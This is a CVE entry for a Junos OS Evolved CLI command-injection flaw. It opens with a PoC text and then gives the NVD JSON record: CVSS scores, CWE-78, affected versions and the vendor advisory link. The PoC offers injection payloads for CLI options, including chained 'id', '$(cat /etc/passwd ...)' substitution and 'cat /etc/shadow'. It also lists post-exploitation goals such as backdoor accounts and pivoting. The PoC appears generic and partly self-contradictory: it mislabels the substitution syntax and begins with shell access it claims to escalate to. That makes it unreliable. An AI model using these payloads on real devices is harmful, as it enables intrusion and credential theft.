CVE-2025-60006

# CVE-2025-60006 - Juniper Junos OS Evolved CLI OS Command Injection PoC # Vulnerability: OS Command Injection via CLI option processing # Affected: Junos OS Evolved 24.2 (< 24.2R2-S2-EVO), 24.4 (< 24.4R2-EVO) # Step 1: Log in to Junos OS Evolved CLI with a low-privilege account # ssh user@<junos-evolved-device> # user@device> start shell # Step 2: Identify CLI commands that pass options to backend scripts # Commands that accept string/file path options are typically vulnerable # Step 3: Inject malicious shell commands via CLI options # Example: Inject a command separator (;) to execute arbitrary commands # Example 1: Using semicolon to chain commands request support information | save /tmp/test.txt; id > /tmp/pwned.txt # Example 2: Using backticks for command substitution file show /var/log/$(id -u)_$(whoami).log # Example 3: Using $() for command substitution show log /tmp/$(cat /etc/passwd | head -1).log # Step 4: Verify command execution # If the injected command executes successfully, the attacker has # achieved privilege escalation beyond their assigned permissions # Step 5: Post-exploitation # - Read sensitive configuration files cat /etc/shadow # - Modify system configuration # - Create backdoor accounts # - Pivot to other network devices

{"cve": {"id": "CVE-2025-60006", "sourceIdentifier": "[email protected]", "published": "2025-10-09T17:16:03.857", "lastModified": "2026-01-23T19:38:20.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple instances of an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') \n\nvulnerability in the CLI of Juniper Networks Junos OS Evolved could be used to elevate privileges and/or execute unauthorized commands.\n\nWhen an attacker executes crafted CLI commands, the options are processed via a script in some cases. These scripts are not hardened so injected commands might be executed via the shell, which allows an attacker to perform operations, which they should not be able to do according to their assigned permissions.\n\nThis issue affects Junos OS Evolved:\n\n\n\n * 24.2 versions before 24.2R2-S2-EVO,\n * 24.4 versions before 24.4R2-EVO.\n\n\n\n\nThis issue does not affect Junos OS Evolved versions earlier than 24.2R1-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:M/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:24.2:-:*:*:*:*:*:*", "matchCriteriaId": "0DD89AAD-C615-42AF-B8AF-E6067862F0F5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:24.2:r1:*:*:*:*:*:*", "matchCriteriaId": "28AFF11D-E418-4A76-B557-F60622602537"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:24.2:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "0A86A69D-2B90-4B3B-A6EC-88358284787D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:24.2:r2:*:*:*:*:*:*", "matchCriteriaId": "080BEA58-9667-4C2C-810D-DC1187DB67DA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:24.2:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "34072A94-CFEB-4FAA-8E68-E98D4F7602E4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:24.4:-:*:*:*:*:*:*", "matchCriteriaId": "B32ADA05-5F5D-45B6-BB7B-3FA6A6F229F5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:24.4:r1:*:*:*:*:*:*", "matchCriteriaId": "D6526E82-A6A6-4A65-9B01-B3FCB947F44E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:24.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "CF3B74FA-DF84-4E3E-BCF9-44EEF9E45910"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:24.4:r1-s3:*:*:*:*:*:*", "matchCriteriaId": "DC024CDE-DA63-4E87-BA97-5E8C06B0D8B7"}]}]}], "references": [{"url": "https://supportportal.juniper.net/JSA103163", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}